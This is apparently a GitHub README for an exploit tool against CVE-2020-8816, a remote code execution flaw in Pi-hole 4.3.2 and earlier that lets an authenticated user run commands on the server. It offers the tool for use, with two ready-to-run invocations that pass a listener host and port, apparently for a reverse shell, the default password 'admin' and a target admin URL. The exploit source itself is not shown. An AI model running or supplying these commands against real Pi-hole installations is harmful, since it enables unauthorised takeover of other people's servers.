CVE 2020-8816 :

Pi-hole (versions <= 4.3.2 ) is affected by a Remote Code Execution vulnerability. An authenticated user of the Web portal can execute arbitrary command with the underlying server with the privileges of the local user executing the service.

EXAMPLE :

go run CVE-2020-8816.go -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/

or download the binary CVE-2020-8816 :

./CVE-2020-8816 -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/

References :

https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

CVE 2020-8816 :

EXAMPLE :

References :

Files

README.md

Latest commit

History

README.md

File metadata and controls

CVE 2020-8816 :

EXAMPLE :

References :